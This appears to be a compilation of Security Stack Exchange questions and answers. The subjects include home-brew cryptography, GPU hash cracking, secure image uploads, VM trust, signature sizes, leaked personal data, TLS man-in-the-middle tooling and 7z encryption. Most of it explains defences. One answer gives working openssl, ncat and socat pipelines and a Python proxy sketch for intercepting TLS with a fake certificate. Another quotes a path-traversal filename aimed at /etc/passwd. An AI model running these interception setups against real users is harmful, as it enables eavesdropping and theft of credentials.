I was reading this interesting question: Is my developer's home-brew password security right or wrong, and why? It shows a weak home-brew algorithm developed by "Dave", and the answers discuss why this is a bad idea. (Actually a hashing algorithm rather than encryption, but my question applies to both.) It makes sense to me that a home-brew algorithm is a very bad idea, but there's one thing I'm not understanding. Assume I'm an attacker, and I am faced with a weak-but-unknown encryption algorithm developed by "Dave". How would I crack it? I wouldn't even know where to begin. It would be a seemingly meaningless string of characters. For example, say that the home-brew algorithm is like this: Use a weak well-known encryption algorithm on the original data, then: Do a bitwise negation on any byte whose serial number in the file has a repeated digit sum which is prime. (Or any other such mathematical manipulation, this is just an example.) How would one hack a file produced by such an algorithm without knowing it in advance? Edit: Everybody, please don't try to convince me of how hard it is to keep an algorithm secret. Please answer this question on the assumption that the algorithm is kept completely secret, despite how difficult that is to achieve in real life. Also, assume that I have no access at all to the algorithm, only to the resulting data.
Assume I'm an attacker, and I am faced with a weak-but-unknown encryption algorithm developed by "Dave". How would I crack it? I wouldn't even know where to begin. It would be a seemingly meaningless string of characters. That's correct, you wouldn't. Here's some encrypted data (4587556841584465455874588). Got a clue what that means? Absolutely not. However, you're missing the core, fundamental, most integrally important central pillar (the key to the universe) that holds cryptography together. The idea is simple: the key is everything. That's it. That's the bit you have to protect. The bit you must guard with your life and hope nobody is going to hit you with a hammer until you tell them what it is. On this basis, you must assume that your algorithm can be read by the attacker. They know how it works. They can document its process. If there are any weaknesses, they'll find them. And they'll exploit them. Like that angry CIA Dad from Taken. This, it turns out, is less of an assumption and more the practical case in use. Dave, the home-brew cryptographer, wants to include an encryption algorithm in his program. Deciding to eschew all the testing and design work cryptographers have done for him for free over the years, he writes something involving the odd xor, compiles his program and helpfully gives it to friends. That algorithm is now in their hands. Game over. Now, you might ask "can't I just keep the algorithm secret? That'll work, right?" Oh Dave, plz stop. Nonono. The problem with secret algorithms is that they're much more likely to be stolen. After all, the key is different for each user (actually, this is not a requirement, but let's just assume it is for simplicity) but the algorithm remains unchanged. So you only need one of your implementations to be exposed to an attacker and it is game over again. Edit: Ok, in response to the OP's updated question. Let us assume for a moment that the algorithm is totally unknown. Each of the two participants in an encrypted conversation has perfect security of their algorithm implementation. In this case, you've got data to analyse. You could do any one of the following: Analyze for frequently occurring letters; this is how you'd break a typical Caesar-shift cipher. Attempt to guess the length of the key; with this information, you can move on to looking for repeated ciphertext blocks which may correspond to the same plaintext. Attempt index-of-coincidence and other such measures used to break the Vigenère cipher, since many polyalphabetic ciphers are (possibly) just variants of this. Watch for patterns; any pattern might give you the key. Look for any other clues: do the lengths correspond to a certain measure, are they for example multiples of a certain value such as a byte boundary and thus (possibly) padded? Attempt to analyze with one of the symmetric cipher cryptanalysis techniques; these rely on knowing the algorithm in many cases, so they may not apply here. If you believe the data in question represents a key exchange, you can try one of the many techniques for breaking public-key algorithms. The fact is that a short piece of data from an unknown algorithm could well be undecryptable. However, this does not mean you should rely on this being the case. The more data a cryptanalyst can recover, the more likely they are to break your algorithm.
You probably don't know without serious cryptanalysis what that boundary is - for example, it is reasonable to assume that one could brute-force a Caesar-cipher algorithm for three-letter words, since there are few that make sense. You are up against re-use problems too. In WWII, the Enigma overcame this problem by having programmable settings for its secret algorithm, but this was broken too. There is also the human element of cryptography to consider. I realise the label on the tin says "use once, do not digest" etc., but humans are humans and will likely use it twice, three times, etc. Any such behaviour plays into the hands of the cryptanalyst.
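As a tiny illustration of the first analysis step above (the ciphertext file name is a placeholder), a byte-frequency count is usually where one starts:

<?php
// rank the most frequent bytes in an unknown ciphertext blob
$ciphertext = file_get_contents('ciphertext.bin');
$freq = count_chars($ciphertext, 1);   // byte value => number of occurrences
arsort($freq);
foreach (array_slice($freq, 0, 10, true) as $byte => $count) {
    printf("0x%02X occurs %d times\n", $byte, $count);
}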
{ "source": [ "https://security.stackexchange.com/questions/32779", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16116/" ] }
32,816
What is it about GPUs that lets them crack passwords so quickly? It seems like the driving force behind adopting good key-derivation functions for passwords (bcrypt, PBKDF2, scrypt) instead of yesterday's cryptographic hashes (MD*, SHA*) is that the latter are vulnerable to programs that run on GPUs and guess huge numbers of passwords extremely quickly. Why should GPUs happen to be so much better at evaluating those hash functions than CPUs?
To complete @Terry's answer: a GPU has a lot of cores (hundreds). Each core is basically able to compute one 32-bit arithmetic operation per clock cycle -- as a pipeline . Indeed, GPU work well with extreme parallelism : when there are many identical work units to perform, actually many more than actual cores ("identical" meaning "same instructions", but not "same data"). Some details , for a somewhat old NVidia card (a GTX 9800+, from early 2009): there are 128 cores, split into 16 "multicore units". Each multicore can initiate 8 operations per cycle (hence the idea of 128 cores: that's 16 times 8). The multicore handles work units ("threads") by groups of 32, so that when a multicore has an instruction to run, it actually issues that instruction to its 8 cores over 4 clock cycles. This is operation initiation : each individual operation takes up to 22 clock cycles to run. You can imagine the instruction and its operands walking into the circuit as an advancing front line, like a wave in a pool: a given wave will take some time to reach the other end of the pool, but you can send several waves sequentially. So you can maintain the rhythm of "128 32-bit operations per cycle" only as long as you have at least 22 times as many "threads" to run (i.e. a minimum of 22·128 = 2816), such that threads can be grouped by packs of 32 "identical" threads which execute the same instructions at the same time, like hip-hop dancers. In practice, there are some internal thresholds and constraints which require more threads to achieve the optimal bandwidth, up to about 4096. I could achieve close to 99% of the optimal bandwidth with a SHA-1 implementation. SHA-1 uses a bit more than 1100 32-bit operations (that would be around 900 on a CPU, but a GTX 9800+ has no rotation opcode, so rotations must be split into two shifts and a logical or), and the GPU ran at 1450 MHz, for a grand total of about 160 million SHA-1 computations per second. This can be achieved only as long as you have millions of SHA-1 instances to compute in parallel, as is the case for password cracking (at any time, you need 4096 parallel SHA-1 to feed the GPU cores, but you also have to deal with I/O costs for input of potential passwords, and these costs will dominate if you do not have a lot of SHA-1 instances to process). The host PC, on its CPU (a quad-core 2.4 GHz Intel Core2), could achieve about 48 million SHA-1 per second, and that was with thoroughly optimized SSE2 code. A single SHA-1 will use about 500 clock cycles on such a CPU (the CPU can compute several instructions in a single cycle, provided they don't compete for resources and don't depend on each other), but, for password cracking, it is worthwhile to use SSE2 with its 128-bit registers, and able to compute 4 instructions in parallel. With SSE2 constraints, it takes about 800 clock cycles to run four parallel SHA-1, so that's 200 clock cycles per SHA-1 instance. There are four cores in that CPU and the whole thing runs at 2400 MHz, hence 48 million per second. More recent hardware will be faster, but GPU more so. A GTX 680 sports a whooping 1536 cores, and there are two such GPU in a GTX 690. We are talking billions of SHA-1 instances per second here. (For comparison, I also did an implementation of SHA-1 on the Cell processor , i.e. the CPU in a PS3 console, with its 8 "SPU" coprocessors. One SPU was not available. With the 7 others, I reached about 100 million SHA-1 per second, i.e. better than a contemporary big PC CPU, but not as good as a good GPU of the same era.) 
Summary: GPUs achieve great performance by using heavy parallelism, with hundreds (if not thousands) of cores. This is made possible by pipelining (each individual operation takes many cycles to run, but successive operations can be launched like trucks on a highway) and by sharing instruction decoding (since many cores will run the same instructions at the same time).
{ "source": [ "https://security.stackexchange.com/questions/32816", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4722/" ] }
32,852
My client wants a photography site where users can upload their photos in response to photography competitions. Though technically this isn't a problem, I want to know the risks associated with allowing any user to upload any image onto my server. I've got the feeling the risks are high... I was thinking of using something like this http://www.w3schools.com/php/php_file_upload.asp If I do let anonymous users upload files, how can I secure the directory into which the images (and potentially malicious files) will be uploaded?
The biggest concern is obviously that malicious users will upload things that are not images to your server. Specifically they might upload executable files or scripts which they will attempt to trick your server into executing. One way to protect against this is to make sure that the files are not executable after you move_uploaded_file in PHP. This is as simple as using chmod() to set 644 permissions. Note that a user can still upload PHP scripts or other scripts and trick Apache into executing them depending on your configuration. To avoid this, call getimagesize() on the files after they are uploaded and determine what file type they are. Rename the files to a unique filename and use your own extension . That way, if a user uploads evil.jpg.php , your script will save that as 12345.jpg and it won't be executable. Better yet, your script will not even touch it as it will be an invalid JPEG. I personally always rename uploaded images to either the current timestamp from time() or a UUID. This also helps prevent against very evil filenames (like someone trying to upload a file they've named ../../../../../../../../etc/passwd ) As further protection you can use what's sometimes known as an "Image Firewall". Basically this involves saving uploaded images to a directory which is outside the Document Root and displaying them via a PHP script which calls readfile() to display them. This might be a lot of work but is the safest option. A secondary concern is users uploading too many files or files which are too large, consuming all the disk space available or filling the hosting user's quota. This can be managed within your software, including limiting the size of individual files, the amount of data one user can upload, the total size of all uploads, etc. Make sure the website admin user has a way to manage and delete these files. Do not rely on any of the data in $_FILES . Many sites tell you to check the mime type of the file, either from $_FILES[0]['type'] or by checking the filename's extension. Do not do this . Everything under $_FILES with the exception of tmp_name can be manipulated by a malicious user . If you know you want images only call getimagesize as it actually reads image data and will know if the file is really an image. Do not rely on checking the HTTP Referrer for any security. Many sites advise you to check to make sure that the referrer is your own site to ensure that the file is legitimate. This can easily be faked. For further information, here are some good articles: http://software-security.sans.org/blog/2009/12/28/8-basic-rules-to-implement-secure-file-uploads/ http://nullcandy.com/php-image-upload-security-how-not-to-do-it/ http://www.acunetix.com/websitesecurity/upload-forms-threat/ http://josephkeeler.com/2009/04/php-upload-security-the-1x1-jpeg-hack/
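The advice above is PHP-specific, but the principles carry over to any stack. Here is a hypothetical Python sketch of the same checklist (Pillow plays the role of getimagesize(); the upload directory, allowed formats and permissions are illustrative choices, not requirements):

import os
import shutil
import uuid
from PIL import Image  # Pillow is assumed to be installed

UPLOAD_DIR = "/srv/app/uploads"   # ideally outside the document root

def store_uploaded_image(tmp_path: str) -> str:
    """Validate an uploaded file as a real image and store it under our own name."""
    # 1. Verify the content really is an image; never trust the client's
    #    file name or declared MIME type.
    try:
        with Image.open(tmp_path) as img:
            img.verify()                  # cheap structural check
            fmt = (img.format or "").lower()
    except Exception as exc:
        raise ValueError("not a valid image") from exc
    if fmt not in ("jpeg", "png", "gif"):
        raise ValueError("unsupported image type")

    # 2. Pick our own name and extension -- ignore whatever the user supplied.
    new_name = "%s.%s" % (uuid.uuid4().hex, "jpg" if fmt == "jpeg" else fmt)
    dest = os.path.join(UPLOAD_DIR, new_name)

    # 3. Move it into place and make sure it is not executable.
    shutil.move(tmp_path, dest)
    os.chmod(dest, 0o644)
    return new_name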
{ "source": [ "https://security.stackexchange.com/questions/32852", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22257/" ] }
32,902
Question If one installs a VM with "high security" on a host machine with "low security" , will the VM be only as secure as the machine it's installed on, or will the high-security aspects from the VM (e.g. latest service-packs and updates, anti-virus software, firewall, etc.) compensate for the fallibility of the host? Background In my line of work, I occasionally need to remotely access customer sites. Customers vary in their remote access processes. Some use dialup, some use VPN and some use web portals. The customers also vary in their security procedures; some are fairly relaxed and some are far more rigid. I have recently been asked to connect to a site via a web portal that does a sweep of my machine, looking for various things such as: Approved OS level Approved Firewall installed and active Approved anti-virus software, spyware software, etc. Several other factors I discovered that my local machine's OS (Windows 8) is not supported by the tool; it looks for "More recent operating systems, such as Windows 7". My guess is the tool is a bit out of date... It also didn't detect our corporate firewall. Anyway, the customer site recommended that I use VMWare on my machine and install an XP VM. I did this and it did pass all the security restrictions from the web portal. Possible duplicates: Would running VMs inside of VMs be a more secure way to study viruses, etc? and How secure are virtual machines really? False sense of security?
The host machine can impact and alter whatever it wishes in the guest VM. The host can read and write all the memory of the guest, stop and restart it on a per-instruction basis, and, by nature, sees every single data byte which enters or exits the guest. There is nothing which the OS in a guest VM can do to protect itself against an hostile host. Thus, if the host is vulnerable and subverted (an hostile attacker takes control), then the guests are toast. In your specific case , be assured that if the "protection software" is not aware of the existence of Windows 8, then it is indeed too old to be much good against virus. I bet your customer knows it, too; by recommending a workaround (the VM with Windows XP), he is showing you how work can still be done without having to openly rebel against a company policy. In big organizations, there are often legacy policies which outlast their usefulness by years but can be removed only by waiting for the responsible people to retire or be fired.
{ "source": [ "https://security.stackexchange.com/questions/32902", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6220/" ] }
32,917
I'm curious why an ATM computer is considered secure. The general adage of "If an attacker has physical access to my machine, all bets are off," seems to not apply in this circumstance (since everyone has physical access to the machine). Why is this? I thought of the fact that many have security cameras placed over them, but this doesn't seem sufficient to keep ATMs secure, as there is no one constantly watching the camera feed and looking for suspicious behavior. The most this could be used for is identifying an attacker after an attack has been attempted. It seems like this is fairly easily solved through plain clothes, a mask, gloves, etc. So if this alone isn't or shouldn't be enough of a deterrent, why do we not see ATMs getting hacked for all their cash at 4:00am? What makes the device so secure? Is it just a simple risk-reward analysis, where the cash in the ATM isn't worth the effort of the hack? Or is there more to it which makes the computer secure? Also, I noted that there have been a couple questions about ATM security (like this one and this one ), but mine is about the physical security of the machine, since it violates a common security principle, not anything network related.
I think the assumption here is wrong. They don't have physical access to the machine. They have supervised access to a very limited control panel for a machine which is built into a bomb-proof safe, bolted to the ground and hooked up to an alarm system with an armed response force. Get the machine out of the vault and away from supervision and then yes... all bets are off.
{ "source": [ "https://security.stackexchange.com/questions/32917", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16239/" ] }
32,928
I received a pretty blatantly spammy email to my Gmail account. Attached to the email is a supposed HTML file. My first hunch was that it was probably one of the following: A nasty executable file masquerading as a simple HTML file, or An actual HTML file meant to be opened in a browser in a phishing attack My guess is that it really is an HTML file, since Gmail claims the attachment is only 1K in size. I know I should probably just mark this as spam and get on with my life, but my curiosity is getting the best of me... I really want to know what's in that attachment. Is there a safe way to go about downloading it to a sandboxed location and inspecting the contents? I'm at the beginning of a career shift into the security field, and I would love to pick apart this real world example of something potentially nasty and see how it ticks. I'm thinking a LiveCD or a VM would be a safe environment... I would prefer to do it in a clean, un-networked environment, but in any case, I'll still be logging into my Gmail account to download the thing. Any suggestions?
It could also be:

3. HTML page with JavaScript code attempting to exploit a vulnerability in your browser.
4. HTML page with an embedded Java applet attempting to exploit a vulnerability in the JVM.
5. HTML page with an embedded Flash file attempting to exploit a vulnerability in Flash Player.
6. The email itself, before you open the attachment, could try to exploit a vulnerability in your email client.

There might be other possibilities. For this purpose, I have the following setup:

- Virtual Machine using VirtualBox. No network access. I have a snapshot saved for the VM after a fresh OS install. I also take two snapshots with What Changed? and TrackWinstall.
- I copy files only in the direction Host -> VM, using a free ISO creator. I create the .iso file and mount it.
- Then I can have all the fun I want on the VM itself. I usually run the malware and study memory usage, CPU load, listening ports, networking attempts.
- I check the changes to the OS using What Changed? and TrackWinstall.
- Finally I restore to the fresh snapshot.

The reason I have the whole setup is because I like to run the malware and see what it's trying to do.

Update: I was talking to a colleague who performs malware analysis as a hobby and he told me about his setup; it might be different from what you might want for an occasional .html attachment check.

- Old PC with a fresh OS install. After installing the needed tools he takes a full-disk image using Clonezilla Live.
- What Changed? for snapshot comparisons.
- The PC is connected to the Internet through a separate network.
- Whenever he finishes working on a sample, he reboots with Clonezilla and restores the full-disk image.
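If the goal is only to peek inside a small .html attachment, a purely static look (never rendering or executing it) already reveals a lot. A hypothetical Python sketch you could still run inside the disposable VM for good measure:

import re
import sys

def inspect_html(path: str) -> None:
    """Print the interesting bits of a suspicious HTML file without executing it."""
    with open(path, "rb") as f:
        raw = f.read()
    print("size: %d bytes" % len(raw))
    text = raw.decode("utf-8", errors="replace")

    # Anything the page would load or navigate to.
    for url in sorted(set(re.findall(r"https?://[^\s'\"<>]+", text, re.IGNORECASE))):
        print("url:", url)

    # Inline script, iframe and form tags are the usual suspects.
    for m in re.finditer(r"<(script|iframe|form|object|embed)\b[^>]*>", text, re.IGNORECASE):
        print("tag:", m.group(0))

    # Long base64-looking blobs often hide a second-stage payload.
    for blob in re.findall(r"[A-Za-z0-9+/=]{120,}", text):
        print("possible base64 blob, length", len(blob))

if __name__ == "__main__":
    inspect_html(sys.argv[1])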
{ "source": [ "https://security.stackexchange.com/questions/32928", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22332/" ] }
33,044
I've had a look at several signature schemes (DSA, ECDSA for the most common ones), and am wondering whether there exists a scheme that would have the following properties:

- Be asymmetric (one needs a private key to sign, one can verify with a public key)
- Have a very short signature size (less than 50 bits)
- Be secure by today's standards (hard to find the private key knowing a signature and the signed text)

I wouldn't even care if several signatures were valid for one text, as long as they are verifiable with the public key. My intuition is that being secure is inherently linked to the size of the encryption key, which itself has an impact on the size of the signature. As far as I could see, ECDSA gives shorter signatures than DSA with the same level of security, but the signatures are still too big for my use... Any thoughts / links to signature schemes welcome. edit: I read about BLS at some point too, but couldn't really find out whether it is doable to get a scheme secure enough with a signature less than 50 bits long. edit2: I should add that the goal is to use that for an OTP scheme, so the size of messages to sign would be small (< 512 bytes), and collisions wouldn't be a big problem: assuming the two parties know the message, I'd want one of them to verify that the other has a private key, using a very short signature.
You cannot have a secure signature scheme in less than 50 bits. Demonstration: the attacker can just enumerate all sequences of 50 bits until a match is found. Indeed, one point of digital signatures is that the verification algorithm can be computed by just about everybody, since it uses only the public key (which, by definition, is public). The best you can hope for, theoretically, is a signature of n bits for a security of 2^n. Traditional threshold of infeasibility was n = 80 bits, but the relentless advance of technology tends to raise that. Modern cryptographers tend to jump to 128 bits, because that's a power of two, hence beautiful (Kant notwithstanding, most aesthetic judgements are relative). 100 bits ought to be safe for quite some time, though.

Among known signature algorithms which are believed to be secure, BLS is right now the best in class; it will produce signatures of size 2n bits for a security level of 2^n, so you are contemplating signatures of size 160 to 200 bits at least. There are algorithms which can go below (down to about 1.4·n) but they have a rather long history of breakage and fixing and breakage again (I am talking about SFLASH and its ilk), so their use is not really recommended, and there's no directly usable standard.

Another possibility is to use RSA with ISO/IEC 9796-2 padding. As the linked article shows, there are some subtleties with regards to its usage. This signature scheme is a scheme "with recovery", meaning that while the signature is rather bulky (1024 bits if you use a 1024-bit RSA key), it can also embed some of the data which is signed; so, if your problem is about appending a signature to a message, then this scheme will induce relatively low overhead. As the article explains, you get 2^61 protection for a signature overhead of 22 bytes, aka 176 bits; to get good security, you would have to use a hash function with an output size of, say, 224 bits, leading to a signature overhead of 240 bits -- not as good as the 200 bits of an equivalent-strength BLS, but better than the 400 bits of DSA or ECDSA (for still the same strength level).
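To put rough numbers on that size/security trade-off, here is a small Python sketch; the ratios are only the rules of thumb quoted above, not exact figures for any particular parameter set:

def signature_sizes(n):
    """Approximate signature sizes in bits for a 2**n security target."""
    return {
        "theoretical minimum": n,   # guessing a signature succeeds with probability 2**-L
        "BLS": 2 * n,               # pairing-based, ~2n-bit signatures
        "DSA / ECDSA": 4 * n,       # two values (r, s) of ~2n bits each
    }

for n in (50, 80, 100, 128):
    print(n, signature_sizes(n))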
{ "source": [ "https://security.stackexchange.com/questions/33044", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6439/" ] }
33,069
Forgive me if this should be in the crypto sub, but sometimes the answers there are very mathematical and I would rather have an answer which is a bit lighter on the math. I was watching the Cryptographer's panel from RSA 2013 and at about 33 minutes in they mentioned that ECC is more vulnerable than RSA in a post-quantum world. Can somebody explain why ECC is more vulnerable than RSA in a post-quantum world?
The current challenge in building a quantum computer is to aggregate enough "qubits", entangled together at a quantum level for long enough. To break a 1024-bit RSA modulus, you need a quantum computer with twice that (2048) qubits. To break a 160-bit elliptic curve, which has a "similar strength" (with regards to classical computers), you need six times that (or 960 qubits). It is not that elliptic curves are intrinsically weaker; on the contrary, they still seem somewhat stronger than RSA for the same "size". Rather, the strength ratio for a given size is not the same when considering classical computers versus quantum computers.
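Restating those rules of thumb as code (a trivial Python sketch; the multipliers are the rough figures quoted above, not precise engineering estimates):

def qubits_for_rsa(modulus_bits):
    return 2 * modulus_bits      # ~2n qubits to attack an n-bit RSA modulus

def qubits_for_ec(field_bits):
    return 6 * field_bits        # ~6n qubits to attack an n-bit elliptic curve

print(qubits_for_rsa(1024))      # 2048
print(qubits_for_ec(160))        # 960 -- fewer qubits than the "equivalent-strength" RSA key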
{ "source": [ "https://security.stackexchange.com/questions/33069", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16399/" ] }
33,095
I type my password to login to Win or Linux. Case 1: I get it right. Almost instant reaction. Case 2: I misspelled it. It takes a while, and then rebounds. Why does it takes longer to identify a wrong password vs a correct one? shouldn't the time to identify be the same?
It takes the same time to verify a wrong password and a correct one. But, when the password is wrong, the operating system makes you wait a bit. This is a security feature, to discourage people who try "potential passwords" (in particular people with some electronic skills, plugging in some circuitry which the computer will consider to be a keyboard, but which in reality tries a lot of passwords real fast). Such things don't work as well in a network context (if the attacker wants to try 100 passwords quickly, he can open 100 connections in parallel) but the password verification code is often shared between network and local logon.
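A hypothetical Python sketch of the same idea -- the verification work is identical for right and wrong passwords, and the delay is added only after a failure, purely as a throttle (parameters are illustrative):

import hashlib
import hmac
import os
import time

def hash_password(password: str, salt: bytes) -> bytes:
    # Illustrative KDF settings; a real system would tune these.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def check_password(attempt: str, salt: bytes, stored: bytes) -> bool:
    candidate = hash_password(attempt, salt)       # same cost either way
    ok = hmac.compare_digest(candidate, stored)    # constant-time compare
    if not ok:
        time.sleep(2)                              # artificial penalty on failure
    return ok

salt = os.urandom(16)
stored = hash_password("correct horse", salt)
print(check_password("correct horse", salt, stored))  # returns quickly
print(check_password("wrong guess", salt, stored))    # ~2 seconds slower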
{ "source": [ "https://security.stackexchange.com/questions/33095", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10413/" ] }
33,306
So, I was reading RFC 791, and got to the bit about options ( here ). Everything seemed to be decent and sensible, until I got to the 'levels of security' part. Now, I can understand how, internally, the DoD might want their packets to take special routes, but at the same time, wouldn't using an option like that simply alert people that, hey, this is the traffic most worth trying to decrypt/trace (assuming, of course, that someone sending something classified would also have the basic sense to encrypt the transmission)? Who would use that capability of IP? Why? When would it be helpful to anyone but an attacker sifting through a lot of information? ...Additionally... If I wrote a networked program which labeled all of its packets 'secret', for example, would they be treated any differently when routed through the internet than packets labeled simply 'unclassified' or 'confidential'?
The point of classification flags is that they tell routers what they are allowed to do with a packet. You wouldn't see classification flags on the open internet as they are handled by private government networks. What the flags do, however, is allow routers within the government network to determine if a packet should be allowed to bridge to a public or less secure network without having to understand what is within the packet. Be sure to check out Falcon Momot's answer as well. It has some excellent additional depth.
{ "source": [ "https://security.stackexchange.com/questions/33306", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20350/" ] }
33,323
This may seem like a rather nefarious question; however, my motivations are quite the opposite -- I want to know how at risk I might be! A while ago, a MASSIVE database was leaked that contained the personal information of millions of people. Unfortunately, I'd peg my chances of being in that database at about 80-90%. This means that floating around on the dark web, there could be enough information for a kid to open a credit card in my name and wreak havoc on my life. The institution that this information has leaked from had to give all possibly affected individuals free credit monitoring for 1 year. After that, the millions of us who were vulnerable are left to monitor ourselves and "hope" for the best. I don't trust blind hope. I imagine that when this data was leaked, it was seeded to all of the "typical" dark web sources. With that said, what is the best way for a non-hacker, developer or tech-savvy "power user" to search and discover leaked data so that they can verify whether they are vulnerable from a specific leak? Yes, I could be lying and looking for a quick way to find 100 SSNs. However, I don't think that's a good excuse to hide this information and not be given a straight answer. If the information is out there, it's out there and there's nothing we can do to stop the spread of the information. However, I can do my personal best to be informed as much as possible on the state of my credit risk and current vulnerability. That is all I am hoping to achieve.
Here is what I do... I assume my data is out there... I don't bother looking for it. Somebody will run across my SSN eventually and it will get scraped up into a database and sold around the world. As far as I'm concerned, searching for my data has little value and certainly won't put the horse back into the barn. In fact, even searching for my SSN or credit card numbers could expose them. I live in the US and have placed a credit freeze on our 6 credit reports (3 for me and 3 for my wife). This is done at the websites of the big 3 credit bureaus. When I need a new line of credit (loan, card, etc), I temporarily thaw the reports and they automatically re-freeze after a week or so (Just did this in order to refinance my home). This freezing and thawing process takes about 15 minutes online and has never cost me a cent. http://www.clarkhoward.com/news/clark-howard/personal-finance-credit/credit-freeze-and-thaw-guide/nFbL/
{ "source": [ "https://security.stackexchange.com/questions/33323", "https://security.stackexchange.com", "https://security.stackexchange.com/users/23721/" ] }
33,374
I'd like to perform a man-in-the-middle attack on SSL connections between clients and a server. Assuming the following: I've got a certificate that the client will accept, via poor cert validation or other means. I know the IP address of the server I'm trying to impersonate, and I'm in a position on the network to do things like ARP spoofing. The underlying protocol could be anything, from HTTP to custom / proprietary stuff. I could write some code to listen on a port, serve up the certificate and initiate SSL, then forward stuff on as a transparent proxy, then do some ARP spoofing to redirect traffic to me, but that's a lot of effort and becomes cumbersome when working on a test that has a tight time constraint. What's a quick / easy way to perform a man-in-the-middle attack? Are there any tools designed to facilitate this in a simple way, without lots of configuration? Something that's actively being maintained is a plus.
Updated: For HTTP you can use Burp Suite's proxy (Java), or mitmproxy.

tcpcatcher is a more general Java-based GUI capture and modify proxy which might be closer to your requirements; it includes content decoding and modification (manual and programmatic). It's HTTP biased, but accepts any TCP. It has SSL support, though the only drawback seems to be there's no (documented) way to use your own specific certificate, only on-the-fly ones. You could easily use one of the options below to work around that.

ettercap includes features for ARP, ICMP (redirect), DNS and DHCP "interventions", and supports direct SSL MITM (though not currently via GUI, you need to tinker with the conf and/or command line). This seems to be the best all-in-one for most purposes.

sslsplit is another useful CLI tool; it's (mostly) for intercept and log, not modification. It's quicker to get started with than ettercap and has features like SNI inspection, dynamic certificate generation, support for *BSD and Linux FW/NAT, and OCSP / HPKP / SPDY countermeasures for HTTPS. You still have to get the traffic to it though.

If you want quick, low tech and protocol agnostic, you can get most of the way there with just OpenSSL on a unix box:

mkfifo request response
openssl s_server -quiet -no_ssl2 -cipher AES128-SHA \
    -accept 443 -cert fake.crt -key fake.key < response | tee -a request
openssl s_client -quiet -connect www.server.com:443 < request | tee -a response

-quiet also enables -ign_eof which suppresses special handling of characters at the start of the line (for line-buffered input), like "Q" for quit. s_client also supports basic STARTTLS capabilities: SMTP, POP3, IMAP, FTP (auth), XMPP and TELNET (from OpenSSL-1.1). Start each openssl in a different terminal. Replace the tee's with something scripted to modify requests and replies if needed. It's not the most robust, but it might be useful. It supports DTLS, should you require that; IPv6 support requires OpenSSL-1.1. (GnuTLS supports IPv6, and since v3.0 has DTLS support too, so you can almost certainly do something similar with gnutls-serv and gnutls-cli, I haven't yet tried this though.)

ncat with its -exec option should work too:

ncat --ssl --ssl-cert fake.crt --ssl-key fake.key \
    --sh-exec "openssl s_client -quiet -connect www.server.com:443" \
    -kl 127.0.0.1 4443

You can just use "--exec" and wrap up your own client in a script instead. With s_client it helps performance a lot to pre-create a session file, then add -sess_in ssl.sess -sess_out ssl.sess to your invocations.

Again, if you need to script/code the MITM yourself, socat is another good (and probably the most robust) option:

CERT="cert=test.crt,key=test.key,verify=0"
SSL="cipher=AES128-SHA,method=TLSv1"
socat \
    OPENSSL-LISTEN:4443,bind=127.0.0.1,reuseaddr,$CERT,$SSL,fork \
    EXEC:mitm.sh

With a one-liner like openssl s_client -quiet -connect www.server.com:443 in mitm.sh to start with, it works just like an inetd client.

stunnel is more proxy-like than socat; it has one big advantage that I don't see anywhere else: it supports in-protocol TLS upgrades/STARTTLS, for POP3, IMAP, SMTP and a few others in client and server modes; though LDAP and FTP are notable omissions (the latter understandably). Its inetd mode can be (ab)used just as with the "exec" options above.

For modifying generic text-based common internet protocols using these methods you might be able to get away with some sed (like a more connection friendly netsed) or light expect scripting. 
The multi-protocol proxy Delegate also supports external (inetd-like) handling, and integrated scripting support for matching, filtering and rewriting for a subset of the supported protocols. The only other things I can think of close to generic protocol-agnostic MITM proxies are fuzzing tools, like proxyfuzz, or multi-protocol modular ones like backfuzz (be careful searching for that last one ;-).

Other possibly useful tools (for misdirecting traffic) include:

- dsniff, including arpspoof
- another arpspoof, this version with IPv6 support
- arpsend from vzctl
- dnschef DNS proxy/server (Python)

I also came across references to Zorp several times while rummaging through my notes, available in both a commercial, non-free version (I have no affiliation) and a GPL version. Worth a mention, due to its claims of being a modular, extensible (by way of Python) multi-protocol firewall/gateway. TLS inspection is supported in the GPL version (SSH and others seem limited to the non-GPL version).
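And if none of the ready-made tools fit and you do end up writing the "listen with a fake certificate, then forward" proxy described in the question, the skeleton is quite small. A hypothetical Python sketch (the certificate files and target host are placeholders, and error handling is mostly omitted):

import socket
import ssl
import threading

LISTEN = ("0.0.0.0", 4443)
TARGET = ("www.example.com", 443)        # placeholder upstream server
FAKE_CERT, FAKE_KEY = "fake.crt", "fake.key"

def pump(src, dst, tag):
    """Copy bytes one way; this is where you would log or modify traffic."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            print(tag, repr(data[:80]))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close()
        dst.close()

server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_ctx.load_cert_chain(FAKE_CERT, FAKE_KEY)

client_ctx = ssl.create_default_context()
client_ctx.check_hostname = False        # deliberately not validating upstream
client_ctx.verify_mode = ssl.CERT_NONE

with socket.create_server(LISTEN) as listener:
    while True:
        raw, _ = listener.accept()
        try:
            victim = server_ctx.wrap_socket(raw, server_side=True)
            upstream = client_ctx.wrap_socket(
                socket.create_connection(TARGET), server_hostname=TARGET[0])
        except (ssl.SSLError, OSError):
            raw.close()
            continue
        threading.Thread(target=pump, args=(victim, upstream, ">"), daemon=True).start()
        threading.Thread(target=pump, args=(upstream, victim, "<"), daemon=True).start()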
{ "source": [ "https://security.stackexchange.com/questions/33374", "https://security.stackexchange.com", "https://security.stackexchange.com/users/5400/" ] }
33,410
You have a zip file that you created with 7z to password-protect it with AES 128. Can a smart adversary extract the data only through brute force, or is the file vulnerable to other attacks - such as, I don't know, being able to bypass the password and extract the data?
ZIP files are encrypted with AES-256, and the key is derived using a slow key-derivation function (KDF), which makes bruteforce and dictionary attacks generally infeasible. There are no currently known ways to bypass the encryption.
{ "source": [ "https://security.stackexchange.com/questions/33410", "https://security.stackexchange.com", "https://security.stackexchange.com/users/4980/" ] }
33,428
